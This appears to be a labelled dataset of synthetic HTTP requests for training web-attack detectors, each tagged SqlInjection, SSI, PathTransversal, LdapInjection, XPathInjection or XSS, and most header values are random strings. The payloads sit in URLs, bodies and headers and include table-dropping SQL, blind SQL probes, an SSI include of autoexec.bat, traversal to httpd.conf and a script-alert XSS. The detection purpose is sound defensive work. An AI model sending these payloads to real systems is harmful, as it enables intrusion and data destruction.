If-Range: Tue, 12 Jun 07 08:00:33 CET
Max-Forwards: 822
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic YTNzRmljdDpuaWVobHk0cA==
Authorization: gZEtif rrhftl=igoft4in
Range: 326-,2201-0740,2-99478
Referer: http://www.kEngi.ch/wgea0Hsa/eict/eeeOeIr/10ntntr/EndA.msf
TE: gzip;q=0.9
Trailer: Accept-Charset
User-Agent: eWUDAOY http://www.ehwdcsiv.it
UA-CPU: MIPS
UA-Disp: 646,7509,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5234x268
Via: HTTP/2.9 www.eiaYgktt.css, 6.8 www.tlWno.tiff, 7.9 www.5vsec.png
Transfer-Encoding: nhaap; tiwt=Qrqbv
Upgrade: bFbb/5.5
Warning: 070 170.64.102.87 "denlnse4nrsv" "Tue, 19 Aug 08 18:04:18 UTC"
X-Forwarded-For: 84.135.253.198
X-Serial-Number: 559061405127813998
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39309
Start - Id: 41712
class: SqlInjection
GET /sfYHCRQ1IWC@27.EcZ/PUt1kfj.B/qQ/tekonpHveEoEa/oiucinTeea1osae0/Ea/pm-/winntnvbscript372.tiff?ygaomnron=Tezcerk2za12&NOz1AdSdx-dc=%27++++OR+++%27m%27%3D++%27++&SsgLA=oeLF1H89&nhoqh5e40ttul=3406938&l0d5ehIFlHon=gjo&shmea=17&urub1ln1et=4Ty&cuoscyeat1=m%29e HTTP/1.0
Host: 21.38.156.230:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-2022-kr, windows-1250, iso-8859-9;q=0.8, iso-8859-2, us-ascii
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: no-store
Client-ip: 60.67.60.69
Cookie: acnti=e4Y32uwP._;XwGWU.L=rRZ6XQ0;ahbt5utrger=13;tascanopecn=uIXo
Cookie2: $Version="0"
Date: Fri, 25 Mar 05 21:59:54 GMT
ETag: "njdjAAshwzP.oyh3W"
Expect: 100-continue
From: daatsa@4adiaM.fr
If-Modified-Since: Fri, 25 Feb 05 12:24:40 GMT
If-Unmodified-Since: Sat, 31 Mar 07 05:07:04 UTC
If-Match: "GlBGxIFWRYIOYCD4w"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Basic bmF0YzY6UmVTZXFkN3Q=
Authorization: Digest opaque="Adepe"
Range: 864538-4,42725-309719
Referer: /aae8afso.dll
TE: chunked;q=0.7
Trailer: Via
User-Agent: Mozilla/9.8 (X11; U; Solaris 6.5; w0-lS; rv:8.9.4) Gecko/00163150
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5958x694
Via: HTTP/0.2 www.orcbefoE.html, 6.9 81.211.65.19
Transfer-Encoding: deflate
Upgrade: er1tt/1.6, mxcea/2.3, tute7/7.3
Warning: 916 www.eheltm.css "rn5mT" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 611965021882313
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41712
Start - Id: 40700
class: SSI
PUT /r.Wq/telnetmocha.tiff? HTTP/1.0
Content-Length: 137
Content-Language: gtomid
Content-Encoding: compress
Content-Location: /ueeEef/sm4peqh6/ta9t/fhiam/iis5Dy51.exe
Content-MD5: MzFjcGllZ3RPZXVzZG9pZQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 23 Feb 07 22:40:09 UTC
Host: www.mreeIdae.st
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, compress;q=0.6
Accept-Language: trot-ereb61s;q=0.4, nkdu-e;q=0.5, de-mvngt;q=0.8, era-NtwNyAmb;q=0.8
Cache-Control: only-if-cached
Cookie: Jimg.PVDAjC=4Iyd;Sal4Sei=waiSH6ntjcta1idm;GmgRa2=aelmouopena;josIO=R1eMesk0zki
Date: Mon, 01 Feb 10 02:11:43 GMT
Expect: 100-continue
If-Unmodified-Since: Tue, 09 Oct 07 07:01:58 UTC
If-None-Match: "WS0Q93758E-_IIa8vJQN"
If-Range: *
Authorization: Digest opaque="ntrmn"
Range: 3-504891,-7,87825-8247
Referer: http://www.acuOe.be/adrry6/ont1NA/xm3ew8e.exe
TE: gzip
Trailer: Upgrade
User-Agent: <!--     #include virtual="d:\windows\autoexec.bat"    -->
Transfer-Encoding: deflate
----: ------------------

binl1eRu56=]c&aefpheSsa=d+bi aOdi9&drrEuo=3 ldpoN &dnynisenHp=it&TclikeformCldelete6K=hiIlh2r&sxutmoaaltnos31=678200&tdyeUs0ecs5n=412

End - Id: 40700
Start - Id: 42026
class: SqlInjection
GET /nsheneeaefyf/ItiEzsmtHdlnjrisi/A7aiLtno9rtaPiiita/h8SB.R/hXOagprIs/snc1nytArhd/r9gjaRUsjWAM/o8etcrManr/sma3Fnfjitethxctx/eGDu-z6o1C/sdoheOsebntgsti/ip7D.css?D_Hiframe=8928888&2e3W=602214966&n0t=AND++++ascii%28lower%28substring%28%28SELECT+TOP++1++tls+FROM+++++sysobject+++WHERE+++++xtype+++++%3D++++%27U%27%29%2C1%2C1%29%29%29++%3E++++111&yts=uI+ahn+eazehd&ayn=i+tkvar&COsHtizEa=eatmpqtN6ec7se&trae4=+5gntwtnli1 HTTP/1.0
Host: www.cCrT.uk
Connection: close
Accept: application/zip;q=0.1
Accept-Charset: cp-950, x-mac-arabic;q=0.8, utf-8
Accept-Encoding: compress, gzip;q=0.6, compress;q=0.6
Accept-Language: *;q=0.3
Cache-Control: min-fresh=97
Client-ip: 144.52.64.113
Cookie: VESOaBBvfJg=rS.0KXr;RFITvgahYMBZ=~g9tr A
Cookie2: $Version="334"
Date: Sun, 12 Nov 06 20:48:00 UTC
ETag: "P@9@6gx8w_ydb.Mba.1"
Expect: ouiSlPr
From: eliqs@octere.st
If-Modified-Since: Wed, 13 Apr 05 03:35:36 GMT
If-Unmodified-Since: Wed, 26 Apr 06 18:25:56 GMT
If-Match: *
If-None-Match: "9H5W6dYxVcKJ1MvM9"
If-Range: "gghkTF6AUe5h4pJ"
Max-Forwards: 6752
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Digest response="8EBC6AbfdcBAA2fEA94dfDD61baEC0de"
Authorization: Digest opaque="4venij"
Range: 4936-0,-6636
Referer: /iIeec/dOeermB/3KBli/6yrio.swf
TE: trailers,gzip;q=0.0
Trailer: Date
User-Agent: iea7aseeiioj
UA-CPU: 68000
UA-Disp: 7502,392,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 0057x268
Via: HTTP/1.6 211.99.188.186:4962, 9.0 89.96.129.153:48917, FTP/3.8 www.u3lie.shtml
Transfer-Encoding: gzip
Upgrade: tomgi/1.4, rQn9a/6.1, etcrc/1.8
Warning: 583 www.veos.jpg "tedi" 
X-Forwarded-For: 58.152.231.239
X-Serial-Number: 063116688396663
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 42026
Start - Id: 44716
class: PathTransversal
PUT /U49G4/eDKb/ebOnibljslnret/zrexRhzetei.php? HTTP/1.0
Content-Length: 109
Content-Language: C9diDa4e,Xmea,olnmE
Content-Encoding: compress
Content-Location: http://www.rrOms.st/rhiica/toe6oo/emthEAne.php3
Content-MD5: c2kycmR0ZVFvYmd4dEVzcg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Mar 07 01:51:39 GMT
Last-Modified: Thu, 17 Aug 06 06:16:08 UTC
Host: www.steubovieg.net
Connection: close
Accept: text/html;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.6
Cache-Control: max-stale=95
Client-ip: 230.63.102.101
Cookie: ss7e=H(iitsoc2l;ajByyiuwlww2sqI=34990;4scriptGL4=69-Mw9BWgy;eSb=6unaETsists;euosepotEntCkes=eid9n;nglta9t9ws=%]o
Cookie2: $Version="777"
Date: Sat, 26 Mar 05 24:27:22 UTC
ETag: W/"PFjDaBxmG5TaISyF"
Expect: iLhe
From: ntofsxe@nilrhaih6.gov
If-Modified-Since: Thu, 08 Jan 09 05:44:29 GMT
If-Unmodified-Since: Sun, 07 May 06 10:00:40 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 66
MIME-Version: 0.7
Pragma: naqRi='ji'
Proxy-Authorization: o7lshm rootirq=tt9s
Authorization: NTLM YWhoaWxHbnR0OHdTdTJTYWRvdXJrYXQ5bjlyaGhlZ3RvbWR0R3FlbWU=
Range: 8542-,-709
Referer: /werrdoN/ete0ema/6tdrem7.jsp
TE: chunked,gzip
Trailer: Proxy-Authorization
User-Agent: nfqrWpizd http://www.s1e6Afi.be
UA-CPU: MIPS
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0076x674
Via: 2.0 www.lwretn1.jpeg, nfrR/2.0 www.rseer.html:02809, 0.5 62.95.39.95:45
Transfer-Encoding: ttmwo; whnei=IauLn8
Upgrade: hcWX/1.9, Lttry/9.2, exAer/3.6, rnt/7.8
Warning: 427 207.57.123.57 "prsEe79slxhsh" "Thu, 19 Jul 07 03:06:44 UTC"
X-Forwarded-For: 37.2.49.250
X-Serial-Number: 145776
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

imgMMIfo55t0u=8125392&wurwstisype=file:///o:/iNa7a/4Ayim/HhKtd.xml&oeOgttTsexoeoSr=m4CcntVsYd

End - Id: 44716
Start - Id: 39430
class: SSI
GET /ohohu9-/xSnetJaeoeglT/Gpnmsg6r1s/ast/teizerctrm4eaerH/.KidpdVe/ebrbieehh/ndt/oBFhlXKPR.html?eeet=%3C%21--%23email+fromhost%3D%22www.0fhioeA.com%22+tohost%3D%22mailbox.hkt.com%22+message%3D%22sremg+rnnatrn+nwonmtH1+dtm%22+fromaddress%3D%22Ihns4y.com%22+toaddress%3D%22uHwe.rtm.com%22+subject%3D%22e%22+sender%3D%22eto.com%22+replyto%3D%222weim.com%22+cc%3D%22tb%22+inreplyto%3D%22esk+dEtc+asBrt%22+id%3D%22Eqlekmail%22+--%3E HTTP/1.1
Host: www.ttwgpfre.it:80
Connection: haoan
Accept: */*;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=876
Client-ip: 126.45.36.156
Cookie: knLlooep9ba4Aft=6e;dnxtaxnhinzmoPt=nsXy
Cookie2: $Version="308"
Date: Sat, 14 Aug 04 03:25:26 CET
ETag: "P-Tn4wktcNK4yLQpyHtZ"
Expect: 100-continue
From: nitnd0Ry@sdsmmyeanh.ch
If-Modified-Since: Tue, 02 Jan 07 18:10:51 UTC
If-Unmodified-Since: Sun, 20 Nov 05 16:43:22 UTC
If-Match: *
If-None-Match: "7AAeKdOrhU2wzM6gt2"
If-Range: *
Max-Forwards: 47
MIME-Version: 3.5
Pragma: ht=hOmppd
Proxy-Authorization: rashN riiam=cssstki
Authorization: NTLM NmttdG5hZVhvdGdseGllYnRkZHp0dGVkYWhLQW9uZHRjeA==
Range: -07524
Referer: http://jacsr2ue.ch/wt6etid/eolmBZ.asmx
TE: trailers,deflate,chunked
Trailer: Transfer-Encoding
User-Agent: hxk9WceUp4 http://www.oMiEthte.biz
UA-CPU: StrongARM
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 162x589
Via: ewgomt/6.2 www.mkltARel.htm, 8.3 www.1tngt.js, 1dhu/4.0 www.sfex.html
Transfer-Encoding: gzip
Upgrade: Tnfr/9.0, twtet/7.7, sbse/4.5, iht/4.1, rei/1.4
Warning: 280 113.181.5.189:613 "neo5iip" "Wed, 20 Feb 08 05:16:28 CET"
X-Serial-Number: 7022355683967600
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39430
Start - Id: 41475
class: SqlInjection
POST /bmY9J6/dbB5Yu/ootis9siiaihso4eb/pdis6TmBBRHgroup byxa/wygXwreiQ-y0RdL/4G/hI-QtelnetCue.tiff? HTTP/1.1
Content-Length: 195
Content-Language: engcsmp,Geq3ka
Content-Encoding: gzip
Content-Location: http://athi.cz/rnpdsbg/oyu4/ogrr.mspx
Content-MD5: Y3cyZXFkckk4bHRzaWhubw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 10 Jan 10 11:19:35 UTC
Last-Modified: Sun, 06 Apr 08 16:19:11 GMT
Host: www.scfs7.st
Connection: neuv
Accept: */*;q=0.6
Accept-Charset: cp-936, windows-1258
Accept-Encoding: 
Accept-Language: iz-6hj3ytEh, sthe-b5ijbo;q=0.5
Cache-Control: no-store
Client-ip: 33.190.206.236
Cookie: layj=0661907274;ooxthe=1803576;tai=Hdariy6;euee=85218566
Cookie2: $Version="4"
Date: Fri, 30 Mar 07 17:08:23 CET
ETag: W/"fXwEEo9cRQPW3zV"
Expect: nvcrmt2
From: t0cih@nlhtfemb7.st
If-Modified-Since: Wed, 08 Apr 09 18:32:47 UTC
If-Unmodified-Since: Sun, 13 Jul 08 17:43:47 UTC
If-Match: "reHY6kSAzc25vULIjl77"
If-None-Match: "W4g5huuYPxSucrdBruY"
If-Range: Sun, 31 Jul 05 18:27:55 UTC
Max-Forwards: 661
MIME-Version: 4.5
Pragma: ne=taavEa
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: mora yzop=tstnyh3
Range: 78-403185
Referer: /rah9on/rwxc9ibt.jsp
TE: gzip,deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/8.9 (Windows; U; Windows NT 5.3; da-ri; rv:2.5.4) Gecko/31845765
UA-CPU: MIPS
UA-Disp: 848,1754,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 054x8213
Via: hib/1.4 www.esnfNof.css:378, 0.3 130.72.79.72
Transfer-Encoding: iiO1y
Upgrade: duea/0.0
Warning: 241 www.cdHIo.gif "n9doishtsina4rYrfe" "Mon, 20 Aug 07 04:06:39 UTC"
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

trzsuti=s /e mNen$oi2kfhl&sammulsHfFQgbetweenMv=os&onglsjje9=nNJL6mwm&wn8atu7ttao=tscript&BLdzctpfi=fabnLfx-b&lliiieyiokq=1Aw&eoindxieh=OR  '9urdkric'   BETWEEN     'R' AND    'T'

End - Id: 41475
Start - Id: 41645
class: SqlInjection
GET /1haeaj/yFrV_bA1BlYp/i17l/QUaXLhhnvd/eGRO/mtanfmtteeaekh/cpaqnoaeo09ibtn.php?p1PmttrwfbaC=myiu&2-Z37selectV_Uz=stwemei9&zUor7ftno=select++loet++from++ALL_USERS&5esio=97834&FYxOFExq1Qvu=0708861 HTTP/1.0
Host: www.ra6rg.cz
Connection: acloed
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 254.173.30.240
Cookie: D488=90697375;1wu2=13
Cookie2: $Version="52"
Date: Wed, 02 Aug 06 24:46:44 UTC
ETag: W/"r_QJrhsuVl-TmF.YVYtB"
Expect: tt48=sne4our
From: vlIol@haea.org
If-Modified-Since: Wed, 02 Nov 05 08:26:08 GMT
If-Unmodified-Since: Fri, 10 Nov 06 03:57:54 GMT
If-Match: "Vpnm6_tx@bTkEsTmda"
If-None-Match: *
If-Range: Fri, 27 May 05 11:30:42 GMT
Max-Forwards: 948
MIME-Version: 7.4
Pragma: 3mec='e'
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: NTLM bmlkZHRkOXNoZGU3dGJ2c2RiZXJQOWEwZXRvbW9lZnNvUlBONQ==
Range: -11289
Referer: http://xemCtep.uk/EaNxMtdl/iitoD/peoasrs.png
TE: chunked;q=0.5,gzip,trailers
Trailer: Accept
User-Agent: Mozilla/9.4 (compatible; MSIE 9.2; Open BSD i586; ndhtst41da)
UA-CPU: MIPS
UA-Disp: 041,9154,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1153x567
Via: HTTP/4.0 www.eaotb7h.html, 9.3 216.82.44.81, FTP/0.2 211.125.91.162
Transfer-Encoding: hwMoT; dyo6nme=edeogc
Upgrade: liaory/2.2, awo4ag/4.5, oil/7.5, ctOl/2.3, see/4.6
Warning: 891 153.235.102.59 "cOto1fzuiSiEocefsa" 
X-Forwarded-For: 221.42.137.170
X-Serial-Number: 611965021882313
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41645
Start - Id: 44936
class: PathTransversal
GET /t7N9XiJbC6dq18jI/vXCObi2l4DYcDUJXV/irox5adbaonctoy/k_hFlN3/tQOz67X7_MeQrWF6/heenEw/iaCa5U.pNuLle-jI/6adtsaofeH5igdaero/dnoomhipvyywavs6/nzk.shtml?uawd=kthtta&VJmqN@=heTaZ&iC1mhRid36aq5st=..%2F..%2FUBData%2FMembers%2Fmembers.grp%2500&ttXteroa=cskaaeyintsE HTTP/1.1
Host: 162.57.186.230
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: euc-jp;q=0.5, ks_c_5601-1987;q=0.4, windows-1255;q=0.0, shift_jis;q=0.8
Accept-Encoding: *
Accept-Language: ruetsde-ndomT, heb-naun9, HOeu-eheetl;q=0.0, iuiw-ize
Cache-Control: no-transform
Client-ip: 96.108.187.221
Cookie: co=ecus;Y3httpsA=tXhtopcr\stdin3;nmup=eafe
Cookie2: $Version="19"
Date: Wed, 19 Mar 08 07:25:08 GMT
ETag: W/"FTabip4q-bvxfAK_"
Expect: 100-continue
From: soalt1r@dvplbabmDs.be
If-Modified-Since: Mon, 25 Sep 06 13:36:58 CET
If-Unmodified-Since: Sat, 27 Jun 09 17:14:53 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 10 May 04 05:39:10 UTC
Max-Forwards: 2
MIME-Version: 8.4
Pragma: nmaynthe=enrHlq
Proxy-Authorization: 2bktt i6so=2edOr
Authorization: e6tHu E5egen=haLqjtn
Range: 965978-,-986,-07275
Referer: /mrah/ynarn/rt1eo.rar
TE: trailers
Trailer: Cache-Control
User-Agent: nhcaZxta1 (s29AX5; cIIJCWK; hcOv.kI; rSGxCr; vNKMiwP)
UA-CPU: StrongARM
UA-Disp: 3440,7675,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0076x7912
Via: 2.4 www.komsytl.gif, HTTP/8.9 www.P8csToo.gif:99922, HTTP/7.0 www.ro3ee.png
Transfer-Encoding: deflate
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 950 137.235.245.175 "hbxglaknHngrreueDa" "Wed, 14 Feb 07 12:55:59 GMT"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44936
Start - Id: 42667
class: SqlInjection
GET /zdzLKexecl9pVK/oleoha/e0JN1JWfGlKaLwkOr/n32nuaxeosbtytfd/EF.Zftpjsnl/rpuRsRala/o1s3tdtGa/aEzeb/aOh8kqX/i0J/iRfr.crHn.T/z.allZ8Vaccept.tiff?0xtermO6rLi7Dbg=dmochae&jiOe08edad=1onrdotresdt&cieruuTNoap8egn=%27%3B++drop+++++table+++admin&NriiatugNCwdct=oAu%3A HTTP/1.1
Host: 54.206.201.234
Connection: keep-alive
Accept: video/mpeg;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 179.202.66.201
Cookie: Xc4toH2h=iz7gC1v;rmaat3=rz;yetom2=w5Xerv.SaO;eEsfnrnzaua= )pjtmp;d0aIrmfhLtYYx=nrSoMmeytnzbni
Cookie2: $Version="1"
Date: Thu, 20 Mar 08 07:02:42 CET
ETag: W/"uROPmH-wt_Abq65K3"
Expect: 100-continue
If-Modified-Since: Wed, 03 Sep 08 22:08:14 UTC
If-Unmodified-Since: Tue, 22 Jul 08 20:22:13 CET
If-Match: *
If-None-Match: *
If-Range: "WqqhlTpo7fph2PGa1Eu"
Max-Forwards: 770
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: Basic eWFlckVMOnI3NHRu
Authorization: sw7t waee=neao
Range: 73002-0
Referer: /lft7/eaO8nn/bteto7Rs.tar.gz
TE: chunked;q=0.8,deflate;q=0.0
User-Agent: an@Yj0 http://www.rpyu.de
UA-CPU: PowerPC
UA-Disp: 000,128,8
UA-OS: Windows 98
UA-Color: color32
Via: 1.6 www.eNoln.png:5, 0.2 145.216.149.252, 1.2 www.onesfk.gif
Transfer-Encoding: compress
Upgrade: eeog/2.4, mitts/3.0, e6e3i/4.3, oaelt/5.7, heNtCn/4.2
Warning: 783 www.chvaonf.html "Tvnj8wlTdlch3nhl" "Mon, 08 Mar 04 04:17:40 CET"
X-Forwarded-For: 113.84.223.129
X-Serial-Number: 328822
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42667
Start - Id: 46161
class: PathTransversal
GET /sTBYrm-2lPN9cbDjW2/z2TH3CFRETo@OGD8Mesu.cgi?lhous=%29fhS8i&etsrb7s3od=8div+NeRhYsb+%3Enetcatn+u&itas=%2Fetc%2Fhttpd%2Fhttpd.conf&eumsctetotmta=78&0et=ipe3&AiframelXDJs=nr&sOe=fcils&oLemaoeberoi=jd+&etwhmtFrOwhoty=fvboot.inijperlheb&tmpauTechonetcatElDFb-=nas HTTP/1.0
Host: 121.46.176.15
Connection: keep-alive
Accept: application/*, image/*, image/*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: Euelrg-s;q=0.4
Cache-Control: no-transform
Client-ip: 172.17.95.67
Cookie: SBaoaram=238
Cookie2: $Version="276"
Date: Sun, 22 May 05 24:57:30 UTC
ETag: W/"IKbJLxE1_ixqcRxyA"
Expect: xslbWe=dne4
From: ehreer@1nwhcp.uk
If-Modified-Since: Thu, 14 Sep 06 13:53:19 GMT
If-Unmodified-Since: Mon, 09 May 05 24:55:06 UTC
If-Match: *
If-None-Match: *
If-Range: "g.jy01xnEfC_xj97Dc"
Max-Forwards: 7602
MIME-Version: 2.2
Pragma: weP='bYtu'
Proxy-Authorization: slso ala9=euegghy
Authorization: Basic dGxkc2FBMHo6b2l6ZUw=
Range: 6-,3215-
Referer: http://www.sye5ee.uk/uadaeo/seastLt.asmx
TE: trailers,chunked;q=0.1
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.3 (Windows; U; Win 9x 6.7; tn-af; rv:9.5.4) Gecko/88961771
UA-CPU: StrongARM
UA-Disp: 5013,9581,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 390x0476
Via: 1.8 www.nm35e1it.jpg, cltxet/4.5 144.206.115.146
Transfer-Encoding: gzip
Upgrade: efs/0.6
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 90.173.143.30
X-Serial-Number: 143207616945
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46161
Start - Id: 37074
class: LdapInjection
GET /s2/3TMM_k9h/uzlthex1d6thrnsdoi/li5sX9ql5cuJywQ/pealatBrnDctcT.gif?utkehue6aTwt=6415248&lTyEppEddfes=pHeetazrabI&tgag=tga&tittaoeoiPs=glc&udQ-7DHmochaj4sps=127&ehGuan6dn1=nrihnAn0wrAcD&2p=%29++%28%7C++++%28displayName%3Dhad*%29+++%28name++%3D+++had*++++%29%28+++mail%3Dhad*++%29&cir5rtbtimes=cklwltef7ht&TnuitosrLPavpm=hh HTTP/1.1
Host: 72.104.229.180
Connection: keep-alive
Accept: video/quicktime;q=0.4, video/*;q=0.0
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.5, gzip
Accept-Language: t-nooeaEo, ie-eAt;q=0.0
Cache-Control: max-stale
Client-ip: 172.225.76.42
Cookie: nee6Nmooe=6Gajml2saf6cEeCu
Cookie2: $Version="658"
Date: Fri, 28 Aug 09 05:24:46 CET
ETag: W/".eEQ4Wr5D0sN1fBRU"
Expect: 100-continue
From: Wtzcle@sDsakEtber.gov
If-Modified-Since: Tue, 11 Mar 08 06:35:45 UTC
If-Unmodified-Since: Thu, 02 Apr 09 16:09:18 GMT
If-Match: *
If-None-Match: "vln_VlCTbsbty1@NgJa"
If-Range: Fri, 20 Nov 09 18:41:43 CET
Max-Forwards: 260
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest response="CB0ac9d59ddCF835AdcB7a4b7B71f8fC"
Authorization: wa3fa0 aiaNjca=yhetw5Y
Range: -5
Referer: http://www.snunq.cz/7edgdoC/tias/sdrido/ea3ja1g/fOyd.msf
TE: chunked;q=0.2,deflate,gzip;q=0.3
Trailer: Authorization
User-Agent: f3IFFB7A http://www.rsWsoa.biz
UA-CPU: PowerPC
UA-Disp: 538,106,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 461x7898
Via: HTTP/1.3 www.neCatd.gif, 8.6 231.181.80.107, 5anene/5.8 www.bgnoqmr.css
Transfer-Encoding: trtft2
Upgrade: a5cjN/4.9
Warning: 233 127.78.233.52 "baru8" "Tue, 09 Mar 04 09:31:50 CET"
X-Forwarded-For: 75.212.179.183
X-Serial-Number: 733012895588
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37074
Start - Id: 49491
class: XPathInjection
GET /7teun3becitn4pd1zUa/sI79hArd/m1SE./eAKs_E-p02FJcHlfza5/acF/stpf3jYS6@YscPdQo/eeAegsd3ayesken5ha/uaiodlate29rxsdtalh/eJCJT825SlT_24S9v/weC5LrxNtsoei.dll?8eEIeAxepw=1a%2Fle4t%2Fom9m%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D7%5D++%7C+eeefd%2Flea%2FOflssh%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D506%5D++or+%273m5nn%27+%3D+%27&iditetuaieiee=2&ethnt1stda=t%40CH6K_I%406&ouboi=uuoosRS2oewri9&tieiNDDsud0xtn=ogL7b5mGOy-&jlsnslIt3est=4259408 HTTP/1.0
Host: www.nonse.ch
Connection: close
Accept: */*;q=0.6
Accept-Charset: euc-kr, utf-8
Accept-Encoding: *
Accept-Language: oj8oenoh-uelT4j
Cache-Control: no-cache
Client-ip: 223.242.155.63
Cookie: bnn=a;XLTZUk=rsevniTTa4ue;nhsOasDsmote=a@o;u2dPROeysf=tli0X6lotOney;uunejunyn=Wnwsaileiewd7fs;.MHe@delete=dussgjrnClr
Cookie2: $Version="672"
Date: Fri, 23 Jan 09 13:53:11 CET
ETag: W/"8WDs@-d9IdX423MDOwo"
Expect: zimlrze=7x4eo
From: sryguohs@efdmr.biz
If-Modified-Since: Mon, 21 Jun 04 01:02:42 UTC
If-Unmodified-Since: Tue, 05 Dec 06 22:13:41 CET
If-Match: *
If-None-Match: "-y6rCclwapUEnpa_TC"
If-Range: "7-a8uyyKzeZr_c4Utg"
Max-Forwards: 7232
MIME-Version: 4.4
Pragma: xdt9s=iiaShtty
Proxy-Authorization: 79Ynan eOtsi=mrfenfti
Authorization: NTLM Y2V0dHJtaGhlbmlueXRlM3lyT3NqdEhoYW9udHR0aW5HdG50bmhva2hzb2d0dE8=
Range: -012
Referer: /bb1o/5Eeoo.mpeg
TE: trailers,chunked,trailers
Trailer: Authorization
User-Agent: Pioitei/4.9
UA-CPU: Sparc
UA-Disp: 4263,349,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 527x1451
Via: FTP/6.6 221.185.154.74, HTTP/2.7 46.208.240.221
Transfer-Encoding: deflate
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 596 86.55.19.248 "dsp73taqn" "Sun, 08 Apr 07 14:02:10 UTC"
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: --------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49491
Start - Id: 46514
class: XSS
GET /<script>alert('Vulnerable')</script>.shtml? HTTP/1.0
Host: www.ogdoapoiR.uk:3
Connection: keep-alive
Accept: video/*, application/zip
Accept-Charset: iso-2022-jp;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.6
Cache-Control: snqten6=t
Client-ip: 217.88.94.178
Cookie: sohHReg=54998065;gglta4euplin=wSge>ebd
Cookie2: $Version="1"
Date: Thu, 21 Feb 08 23:00:13 GMT
ETag: W/"CdcL9D22QKTslk5h3r"
Expect: 100-continue
From: csa3iee@teat.com
If-Modified-Since: Sun, 05 Oct 08 09:48:09 GMT
If-Unmodified-Since: Tue, 27 Apr 04 06:36:17 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 16 Jul 08 23:46:15 UTC
Max-Forwards: 8377
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: NTLM d29nc2tzd2ZJbnlsZGNmY2l1dHQ3Z3FzYWdvNG9tZXNmb3RzVG5sdHpxN3Nlcg==
Range: -97604
Referer: http://www.lnywnEw.st/tes7t1l/dtel/LoeeDhtp.php3
TE: trailers,deflate,trailers
Trailer: Pragma
